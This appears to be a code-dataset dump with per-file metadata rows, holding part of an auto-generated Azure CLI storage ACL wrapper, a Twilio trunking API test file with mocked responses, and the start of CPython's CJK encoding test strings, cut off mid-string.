- continue_on_failure -- If set to False, the operation will terminate quickly on encountering user errors (4XX). If True, the operation will ignore user errors and proceed with the operation on other sub-entities of the directory. Continuation token will only be returned when --continue-on-failure is True in case of user errors. If not set the default value is False for this.
- max_batches -- Optional. Define maximum number of batches that single change Access Control operation can execute. If maximum is reached before all sub-paths are processed, then continuation token can be used to resume operation. Empty value indicates that maximum number of batches in unbound and operation continues till end.
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs access update-recursive", locals())
def remove_recursive(acl, account_key=None, account_name=None, auth_mode=None, batch_size=None, connection_string=None, continuation=None, continue_on_failure=None, max_batches=None, sas_token=None, timeout=None):
'''
Remove the Access Control on a path and sub-paths in Azure Data Lake Storage Gen2 account.
Required Parameters:
- acl -- The value is a comma-separated list of access control entries. Each access control entry (ACE) consists of a scope, a type, a user or group identifier, and permissions in the format "[scope:][type]:[id]:[permissions]". For more information, please refer to https://docs.microsoft.com/azure/storage/blobs/data-lake-storage-access-control.
Optional Parameters:
- account_key -- Storage account key. Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_KEY
- account_name -- Storage account name. Related environment variable: AZURE_STORAGE_ACCOUNT. Must be used in conjunction with either storage account key or a SAS token. If neither are present, the command will try to query the storage account key using the authenticated Azure account. If a large number of storage commands are executed the API quota may be hit
- auth_mode -- The mode in which to run the command. "login" mode will directly use your login credentials for the authentication. The legacy "key" mode will attempt to query for an account key if no authentication parameters for the account are provided. Environment variable: AZURE_STORAGE_AUTH_MODE
- batch_size -- Optional. If data set size exceeds batch size then operation will be split into multiple requests so that progress can be tracked. Batch size should be between 1 and 2000. The default when unspecified is 2000.
- connection_string -- Storage account connection string. Environment variable: AZURE_STORAGE_CONNECTION_STRING
- continuation -- Optional continuation token that can be used to resume previously stopped operation.
- continue_on_failure -- If set to False, the operation will terminate quickly on encountering user errors (4XX). If True, the operation will ignore user errors and proceed with the operation on other sub-entities of the directory. Continuation token will only be returned when --continue-on-failure is True in case of user errors. If not set the default value is False for this.
- max_batches -- Optional. Define maximum number of batches that single change Access Control operation can execute. If maximum is reached before all sub-paths are processed, then continuation token can be used to resume operation. Empty value indicates that maximum number of batches in unbound and operation continues till end.
- sas_token -- A Shared Access Signature (SAS). Must be used in conjunction with storage account name. Environment variable: AZURE_STORAGE_SAS_TOKEN
- timeout -- Request timeout in seconds. Applies to each call to the service.
'''
return _call_az("az storage fs access remove-recursive", locals())
| 125.048544 | 405 | 0.783152 | 1,941 | 12,880 | 5.11695 | 0.114374 | 0.056383 | 0.060411 | 0.078031 | 0.937072 | 0.932038 | 0.918546 | 0.912908 | 0.912304 | 0.908176 | 0 | 0.003803 | 0.163043 | 12,880 | 102 | 406 | 126.27451 | 0.917532 | 0.875854 | 0 | 0 | 0 | 0 | 0.121236 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.454545 | false | 0 | 0.090909 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 10 |
312f7ac14118532cec9fd393358a3b3cbff237a9 | 11,077 | py | Python | tests/integration/trunking/v1/test_trunk.py | BrimmingDev/twilio-python | 3226b5fed92b3c2ce64f03e6b19fc4792ef7647f | [
"MIT"
] | 1,362 | 2015-01-04T10:25:18.000Z | 2022-03-24T10:07:08.000Z | tests/integration/trunking/v1/test_trunk.py | BrimmingDev/twilio-python | 3226b5fed92b3c2ce64f03e6b19fc4792ef7647f | [
"MIT"
] | 299 | 2015-01-30T09:52:39.000Z | 2022-03-31T23:03:02.000Z | tests/integration/trunking/v1/test_trunk.py | BrimmingDev/twilio-python | 3226b5fed92b3c2ce64f03e6b19fc4792ef7647f | [
"MIT"
] | 622 | 2015-01-03T04:43:09.000Z | 2022-03-29T14:11:00.000Z | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from tests import IntegrationTestCase
from tests.holodeck import Request
from twilio.base.exceptions import TwilioException
from twilio.http.response import Response
class TrunkTestCase(IntegrationTestCase):
def test_fetch_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.holodeck.assert_has_request(Request(
'get',
'https://trunking.twilio.com/v1/Trunks/TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_fetch_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "POST",
"disaster_recovery_url": "http://disaster-recovery.com",
"friendly_name": "friendly_name",
"secure": false,
"cnam_lookup_enabled": false,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferor",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
'''
))
actual = self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").fetch()
self.assertIsNotNone(actual)
def test_delete_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.holodeck.assert_has_request(Request(
'delete',
'https://trunking.twilio.com/v1/Trunks/TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_delete_response(self):
self.holodeck.mock(Response(
204,
None,
))
actual = self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").delete()
self.assertTrue(actual)
def test_create_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks.create()
self.holodeck.assert_has_request(Request(
'post',
'https://trunking.twilio.com/v1/Trunks',
))
def test_create_response(self):
self.holodeck.mock(Response(
201,
'''
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "POST",
"disaster_recovery_url": "http://disaster-recovery.com",
"friendly_name": "friendly_name",
"secure": false,
"cnam_lookup_enabled": false,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferee",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
'''
))
actual = self.client.trunking.v1.trunks.create()
self.assertIsNotNone(actual)
def test_list_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks.list()
self.holodeck.assert_has_request(Request(
'get',
'https://trunking.twilio.com/v1/Trunks',
))
def test_read_full_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"page_size": 50,
"key": "trunks",
"next_page_url": null,
"page": 0,
"previous_page_url": null
},
"trunks": [
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "POST",
"disaster_recovery_url": "http://disaster-recovery.com",
"friendly_name": "friendly_name",
"secure": false,
"cnam_lookup_enabled": false,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferee",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
]
}
'''
))
actual = self.client.trunking.v1.trunks.list()
self.assertIsNotNone(actual)
def test_read_empty_response(self):
self.holodeck.mock(Response(
200,
'''
{
"meta": {
"first_page_url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"url": "https://trunking.twilio.com/v1/Trunks?PageSize=50&Page=0",
"page_size": 50,
"key": "trunks",
"next_page_url": null,
"page": 0,
"previous_page_url": null
},
"trunks": []
}
'''
))
actual = self.client.trunking.v1.trunks.list()
self.assertIsNotNone(actual)
def test_update_request(self):
self.holodeck.mock(Response(500, ''))
with self.assertRaises(TwilioException):
self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.holodeck.assert_has_request(Request(
'post',
'https://trunking.twilio.com/v1/Trunks/TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX',
))
def test_update_response(self):
self.holodeck.mock(Response(
200,
'''
{
"sid": "TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"account_sid": "ACaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"domain_name": "test.pstn.twilio.com",
"disaster_recovery_method": "GET",
"disaster_recovery_url": "http://updated-recovery.com",
"friendly_name": "updated_name",
"secure": true,
"cnam_lookup_enabled": true,
"recording": {
"mode": "do-not-record",
"trim": "do-not-trim"
},
"transfer_mode": "disable-all",
"transfer_caller_id": "from-transferor",
"auth_type": "",
"auth_type_set": [],
"date_created": "2015-01-02T11:23:45Z",
"date_updated": "2015-01-02T11:23:45Z",
"url": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa",
"links": {
"origination_urls": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/OriginationUrls",
"credential_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/CredentialLists",
"ip_access_control_lists": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/IpAccessControlLists",
"phone_numbers": "https://trunking.twilio.com/v1/Trunks/TKaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa/PhoneNumbers"
}
}
'''
))
actual = self.client.trunking.v1.trunks("TKXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX").update()
self.assertIsNotNone(actual)
| 41.178439 | 151 | 0.54383 | 895 | 11,077 | 6.559777 | 0.13743 | 0.054505 | 0.093851 | 0.10867 | 0.923182 | 0.913643 | 0.896099 | 0.891671 | 0.87055 | 0.84449 | 0 | 0.028015 | 0.332942 | 11,077 | 268 | 152 | 41.33209 | 0.766545 | 0.00984 | 0 | 0.626506 | 1 | 0 | 0.151043 | 0.059947 | 0 | 0 | 0 | 0 | 0.192771 | 1 | 0.13253 | false | 0 | 0.048193 | 0 | 0.192771 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
31432d19fd1a0323166379e4b5a75b9c2f18c106 | 66,874 | py | Python | Lib/test/cjkencodings_test.py | arvindm95/unladen-swallow | 8175e37eaea7ca66ed03283b46bc1d2db0d3f9c3 | [
"PSF-2.0"
] | 2,293 | 2015-01-02T12:46:10.000Z | 2022-03-29T09:45:43.000Z | python/src/Lib/test/cjkencodings_test.py | weiqiangzheng/sl4a | d3c17dca978cbeee545e12ea240a9dbf2a6999e9 | [
"Apache-2.0"
] | 315 | 2015-05-31T11:55:46.000Z | 2022-01-12T08:36:37.000Z | python/src/Lib/test/cjkencodings_test.py | weiqiangzheng/sl4a | d3c17dca978cbeee545e12ea240a9dbf2a6999e9 | [
"Apache-2.0"
] | 1,033 | 2015-01-04T07:48:40.000Z | 2022-03-24T09:34:37.000Z | teststring = {
'big5': (
"\xa6\x70\xa6\xf3\xa6\x62\x20\x50\x79\x74\x68\x6f\x6e\x20\xa4\xa4"
"\xa8\xcf\xa5\xce\xac\x4a\xa6\xb3\xaa\xba\x20\x43\x20\x6c\x69\x62"
"\x72\x61\x72\x79\x3f\x0a\xa1\x40\xa6\x62\xb8\xea\xb0\x54\xac\xec"
"\xa7\xde\xa7\xd6\xb3\x74\xb5\x6f\xae\x69\xaa\xba\xa4\xb5\xa4\xd1"
"\x2c\x20\xb6\x7d\xb5\x6f\xa4\xce\xb4\xfa\xb8\xd5\xb3\x6e\xc5\xe9"
"\xaa\xba\xb3\x74\xab\xd7\xac\x4f\xa4\xa3\xae\x65\xa9\xbf\xb5\xf8"
"\xaa\xba\x0a\xbd\xd2\xc3\x44\x2e\x20\xac\xb0\xa5\x5b\xa7\xd6\xb6"
"\x7d\xb5\x6f\xa4\xce\xb4\xfa\xb8\xd5\xaa\xba\xb3\x74\xab\xd7\x2c"
"\x20\xa7\xda\xad\xcc\xab\x4b\xb1\x60\xa7\xc6\xb1\xe6\xaf\xe0\xa7"
"\x51\xa5\xce\xa4\x40\xa8\xc7\xa4\x77\xb6\x7d\xb5\x6f\xa6\x6e\xaa"
"\xba\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xa8\xc3\xa6\xb3\xa4"
"\x40\xad\xd3\x20\x66\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79"
"\x70\x69\x6e\x67\x20\xaa\xba\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d"
"\x69\x6e\x67\x20\x6c\x61\x6e\x67\x75\x61\x67\x65\x20\xa5\x69\x0a"
"\xa8\xd1\xa8\xcf\xa5\xce\x2e\x20\xa5\xd8\xab\x65\xa6\xb3\xb3\x5c"
"\xb3\x5c\xa6\x68\xa6\x68\xaa\xba\x20\x6c\x69\x62\x72\x61\x72\x79"
"\x20\xac\x4f\xa5\x48\x20\x43\x20\xbc\x67\xa6\xa8\x2c\x20\xa6\xd3"
"\x20\x50\x79\x74\x68\x6f\x6e\x20\xac\x4f\xa4\x40\xad\xd3\x0a\x66"
"\x61\x73\x74\x20\x70\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20"
"\xaa\xba\x20\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c"
"\x61\x6e\x67\x75\x61\x67\x65\x2e\x20\xac\x47\xa7\xda\xad\xcc\xa7"
"\xc6\xb1\xe6\xaf\xe0\xb1\x4e\xac\x4a\xa6\xb3\xaa\xba\x0a\x43\x20"
"\x6c\x69\x62\x72\x61\x72\x79\x20\xae\xb3\xa8\xec\x20\x50\x79\x74"
"\x68\x6f\x6e\x20\xaa\xba\xc0\xf4\xb9\xd2\xa4\xa4\xb4\xfa\xb8\xd5"
"\xa4\xce\xbe\xe3\xa6\x58\x2e\x20\xa8\xe4\xa4\xa4\xb3\xcc\xa5\x44"
"\xad\x6e\xa4\x5d\xac\x4f\xa7\xda\xad\xcc\xa9\xd2\x0a\xad\x6e\xb0"
"\x51\xbd\xd7\xaa\xba\xb0\xdd\xc3\x44\xb4\x4e\xac\x4f\x3a\x0a\x0a",
"\xe5\xa6\x82\xe4\xbd\x95\xe5\x9c\xa8\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xe4\xb8\xad\xe4\xbd\xbf\xe7\x94\xa8\xe6\x97\xa2\xe6\x9c\x89"
"\xe7\x9a\x84\x20\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x3f\x0a\xe3"
"\x80\x80\xe5\x9c\xa8\xe8\xb3\x87\xe8\xa8\x8a\xe7\xa7\x91\xe6\x8a"
"\x80\xe5\xbf\xab\xe9\x80\x9f\xe7\x99\xbc\xe5\xb1\x95\xe7\x9a\x84"
"\xe4\xbb\x8a\xe5\xa4\xa9\x2c\x20\xe9\x96\x8b\xe7\x99\xbc\xe5\x8f"
"\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe8\xbb\x9f\xe9\xab\x94\xe7\x9a\x84"
"\xe9\x80\x9f\xe5\xba\xa6\xe6\x98\xaf\xe4\xb8\x8d\xe5\xae\xb9\xe5"
"\xbf\xbd\xe8\xa6\x96\xe7\x9a\x84\x0a\xe8\xaa\xb2\xe9\xa1\x8c\x2e"
"\x20\xe7\x82\xba\xe5\x8a\xa0\xe5\xbf\xab\xe9\x96\x8b\xe7\x99\xbc"
"\xe5\x8f\x8a\xe6\xb8\xac\xe8\xa9\xa6\xe7\x9a\x84\xe9\x80\x9f\xe5"
"\xba\xa6\x2c\x20\xe6\x88\x91\xe5\x80\x91\xe4\xbe\xbf\xe5\xb8\xb8"
"\xe5\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\x88\xa9\xe7\x94\xa8\xe4"
"\xb8\x80\xe4\xba\x9b\xe5\xb7\xb2\xe9\x96\x8b\xe7\x99\xbc\xe5\xa5"
"\xbd\xe7\x9a\x84\x0a\x6c\x69\x62\x72\x61\x72\x79\x2c\x20\xe4\xb8"
"\xa6\xe6\x9c\x89\xe4\xb8\x80\xe5\x80\x8b\x20\x66\x61\x73\x74\x20"
"\x70\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20"
"\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67"
"\x75\x61\x67\x65\x20\xe5\x8f\xaf\x0a\xe4\xbe\x9b\xe4\xbd\xbf\xe7"
"\x94\xa8\x2e\x20\xe7\x9b\xae\xe5\x89\x8d\xe6\x9c\x89\xe8\xa8\xb1"
"\xe8\xa8\xb1\xe5\xa4\x9a\xe5\xa4\x9a\xe7\x9a\x84\x20\x6c\x69\x62"
"\x72\x61\x72\x79\x20\xe6\x98\xaf\xe4\xbb\xa5\x20\x43\x20\xe5\xaf"
"\xab\xe6\x88\x90\x2c\x20\xe8\x80\x8c\x20\x50\x79\x74\x68\x6f\x6e"
"\x20\xe6\x98\xaf\xe4\xb8\x80\xe5\x80\x8b\x0a\x66\x61\x73\x74\x20"
"\x70\x72\x6f\x74\x6f\x74\x79\x70\x69\x6e\x67\x20\xe7\x9a\x84\x20"
"\x70\x72\x6f\x67\x72\x61\x6d\x6d\x69\x6e\x67\x20\x6c\x61\x6e\x67"
"\x75\x61\x67\x65\x2e\x20\xe6\x95\x85\xe6\x88\x91\xe5\x80\x91\xe5"
"\xb8\x8c\xe6\x9c\x9b\xe8\x83\xbd\xe5\xb0\x87\xe6\x97\xa2\xe6\x9c"
"\x89\xe7\x9a\x84\x0a\x43\x20\x6c\x69\x62\x72\x61\x72\x79\x20\xe6"
"\x8b\xbf\xe5\x88\xb0\x20\x50\x79\x74\x68\x6f\x6e\x20\xe7\x9a\x84"
"\xe7\x92\xb0\xe5\xa2\x83\xe4\xb8\xad\xe6\xb8\xac\xe8\xa9\xa6\xe5"
"\x8f\x8a\xe6\x95\xb4\xe5\x90\x88\x2e\x20\xe5\x85\xb6\xe4\xb8\xad"
"\xe6\x9c\x80\xe4\xb8\xbb\xe8\xa6\x81\xe4\xb9\x9f\xe6\x98\xaf\xe6"
"\x88\x91\xe5\x80\x91\xe6\x89\x80\x0a\xe8\xa6\x81\xe8\xa8\x8e\xe8"
"\xab\x96\xe7\x9a\x84\xe5\x95\x8f\xe9\xa1\x8c\xe5\xb0\xb1\xe6\x98"
"\xaf\x3a\x0a\x0a"),
'big5hkscs': (
"\x88\x45\x88\x5c\x8a\x73\x8b\xda\x8d\xd8\x0a\x88\x66\x88\x62\x88"
"\xa7\x20\x88\xa7\x88\xa3\x0a",
"\xf0\xa0\x84\x8c\xc4\x9a\xe9\xb5\xae\xe7\xbd\x93\xe6\xb4\x86\x0a"
"\xc3\x8a\xc3\x8a\xcc\x84\xc3\xaa\x20\xc3\xaa\xc3\xaa\xcc\x84\x0a"),
'cp949': (
"\x8c\x63\xb9\xe6\xb0\xa2\xc7\xcf\x20\xbc\x84\xbd\xc3\xc4\xdd\xb6"
"\xf3\x0a\x0a\xa8\xc0\xa8\xc0\xb3\xb3\x21\x21\x20\xec\xd7\xce\xfa"
"\xea\xc5\xc6\xd0\x92\xe6\x90\x70\xb1\xc5\x20\xa8\xde\xa8\xd3\xc4"
"\x52\xa2\xaf\xa2\xaf\xa2\xaf\x20\xb1\xe0\x8a\x96\x20\xa8\xd1\xb5"
"\xb3\x20\xa8\xc0\x2e\x20\x2e\x0a\xe4\xac\xbf\xb5\xa8\xd1\xb4\xc9"
"\xc8\xc2\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xbc\xad\xbf\xef\xb7"
"\xef\x20\xb5\xaf\xc7\xd0\xeb\xe0\x20\xca\xab\xc4\x52\x20\x21\x20"
"\x21\x20\x21\xa4\xd0\x2e\xa4\xd0\x0a\xc8\xe5\xc8\xe5\xc8\xe5\x20"
"\xa4\xa1\xa4\xa1\xa4\xa1\xa1\xd9\xa4\xd0\x5f\xa4\xd0\x20\xbe\xee"
"\x90\x8a\x20\xc5\xcb\xc4\xe2\x83\x4f\x20\xb5\xae\xc0\xc0\x20\xaf"
"\x68\xce\xfa\xb5\xe9\xeb\xe0\x20\xa8\xc0\xb5\xe5\x83\x4f\x0a\xbc"
"\xb3\x90\x6a\x20\xca\xab\xc4\x52\x20\x2e\x20\x2e\x20\x2e\x20\x2e"
"\x20\xb1\xbc\xbe\xd6\x9a\x66\x20\xa8\xd1\xb1\xc5\x20\xa8\xde\x90"
"\x74\xa8\xc2\x83\x4f\x20\xec\xd7\xec\xd2\xf4\xb9\xe5\xfc\xf1\xe9"
"\xb1\xee\xa3\x8e\x0a\xbf\xcd\xbe\xac\xc4\x52\x20\x21\x20\x21\x20"
"\xe4\xac\xbf\xb5\xa8\xd1\x20\xca\xab\xb4\xc9\xb1\xc5\x20\xa1\xd9"
"\xdf\xbe\xb0\xfc\x20\xbe\xf8\xb4\xc9\xb1\xc5\xb4\xc9\x20\xe4\xac"
"\xb4\xc9\xb5\xd8\xc4\x52\x20\xb1\xdb\xbe\xd6\x8a\xdb\x0a\xa8\xde"
"\xb7\xc1\xb5\xe0\xce\xfa\x20\x9a\xc3\xc7\xb4\xbd\xa4\xc4\x52\x20"
"\xbe\xee\x90\x8a\x20\xec\xd7\xec\xd2\xf4\xb9\xe5\xfc\xf1\xe9\x9a"
"\xc4\xa8\xef\xb5\xe9\x9d\xda\x21\x21\x20\xa8\xc0\xa8\xc0\xb3\xb3"
"\xa2\xbd\x20\xa1\xd2\xa1\xd2\x2a\x0a\x0a",
"\xeb\x98\xa0\xeb\xb0\xa9\xea\xb0\x81\xed\x95\x98\x20\xed\x8e\xb2"
"\xec\x8b\x9c\xec\xbd\x9c\xeb\x9d\xbc\x0a\x0a\xe3\x89\xaf\xe3\x89"
"\xaf\xeb\x82\xa9\x21\x21\x20\xe5\x9b\xa0\xe4\xb9\x9d\xe6\x9c\x88"
"\xed\x8c\xa8\xeb\xaf\xa4\xeb\xa6\x94\xea\xb6\x88\x20\xe2\x93\xa1"
"\xe2\x93\x96\xed\x9b\x80\xc2\xbf\xc2\xbf\xc2\xbf\x20\xea\xb8\x8d"
"\xeb\x92\x99\x20\xe2\x93\x94\xeb\x8e\xa8\x20\xe3\x89\xaf\x2e\x20"
"\x2e\x0a\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94\xeb\x8a\xa5\xed\x9a"
"\xb9\x20\x2e\x20\x2e\x20\x2e\x20\x2e\x20\xec\x84\x9c\xec\x9a\xb8"
"\xeb\xa4\x84\x20\xeb\x8e\x90\xed\x95\x99\xe4\xb9\x99\x20\xe5\xae"
"\xb6\xed\x9b\x80\x20\x21\x20\x21\x20\x21\xe3\x85\xa0\x2e\xe3\x85"
"\xa0\x0a\xed\x9d\x90\xed\x9d\x90\xed\x9d\x90\x20\xe3\x84\xb1\xe3"
"\x84\xb1\xe3\x84\xb1\xe2\x98\x86\xe3\x85\xa0\x5f\xe3\x85\xa0\x20"
"\xec\x96\xb4\xeb\xa6\xa8\x20\xed\x83\xb8\xec\xbd\xb0\xea\xb8\x90"
"\x20\xeb\x8e\x8c\xec\x9d\x91\x20\xec\xb9\x91\xe4\xb9\x9d\xeb\x93"
"\xa4\xe4\xb9\x99\x20\xe3\x89\xaf\xeb\x93\x9c\xea\xb8\x90\x0a\xec"
"\x84\xa4\xeb\xa6\x8c\x20\xe5\xae\xb6\xed\x9b\x80\x20\x2e\x20\x2e"
"\x20\x2e\x20\x2e\x20\xea\xb5\xb4\xec\x95\xa0\xec\x89\x8c\x20\xe2"
"\x93\x94\xea\xb6\x88\x20\xe2\x93\xa1\xeb\xa6\x98\xe3\x89\xb1\xea"
"\xb8\x90\x20\xe5\x9b\xa0\xe4\xbb\x81\xe5\xb7\x9d\xef\xa6\x81\xe4"
"\xb8\xad\xea\xb9\x8c\xec\xa6\xbc\x0a\xec\x99\x80\xec\x92\x80\xed"
"\x9b\x80\x20\x21\x20\x21\x20\xe4\xba\x9e\xec\x98\x81\xe2\x93\x94"
"\x20\xe5\xae\xb6\xeb\x8a\xa5\xea\xb6\x88\x20\xe2\x98\x86\xe4\xb8"
"\x8a\xea\xb4\x80\x20\xec\x97\x86\xeb\x8a\xa5\xea\xb6\x88\xeb\x8a"
"\xa5\x20\xe4\xba\x9e\xeb\x8a\xa5\xeb\x92\x88\xed\x9b\x80\x20\xea"
"\xb8\x80\xec\x95\xa0\xeb\x93\xb4\x0a\xe2\x93\xa1\xeb\xa0\xa4\xeb"
"\x93\x80\xe4\xb9\x9d\x20\xec\x8b\x80\xed\x92\x94\xec\x88\xb4\xed"
"\x9b\x80\x20\xec\x96\xb4\xeb\xa6\xa8\x20\xe5\x9b\xa0\xe4\xbb\x81"
"\xe5\xb7\x9d\xef\xa6\x81\xe4\xb8\xad\xec\x8b\x81\xe2\x91\xa8\xeb"
"\x93\xa4\xec\x95\x9c\x21\x21\x20\xe3\x89\xaf\xe3\x89\xaf\xeb\x82"
"\xa9\xe2\x99\xa1\x20\xe2\x8c\x92\xe2\x8c\x92\x2a\x0a\x0a"),
'euc_jisx0213': (
"\x50\x79\x74\x68\x6f\x6e\x20\xa4\xce\xb3\xab\xc8\xaf\xa4\xcf\xa1"
"\xa2\x31\x39\x39\x30\x20\xc7\xaf\xa4\xb4\xa4\xed\xa4\xab\xa4\xe9"
"\xb3\xab\xbb\xcf\xa4\xb5\xa4\xec\xa4\xc6\xa4\xa4\xa4\xde\xa4\xb9"
"\xa1\xa3\x0a\xb3\xab\xc8\xaf\xbc\xd4\xa4\xce\x20\x47\x75\x69\x64"
"\x6f\x20\x76\x61\x6e\x20\x52\x6f\x73\x73\x75\x6d\x20\xa4\xcf\xb6"
"\xb5\xb0\xe9\xcd\xd1\xa4\xce\xa5\xd7\xa5\xed\xa5\xb0\xa5\xe9\xa5"
"\xdf\xa5\xf3\xa5\xb0\xb8\xc0\xb8\xec\xa1\xd6\x41\x42\x43\xa1\xd7"
"\xa4\xce\xb3\xab\xc8\xaf\xa4\xcb\xbb\xb2\xb2\xc3\xa4\xb7\xa4\xc6"
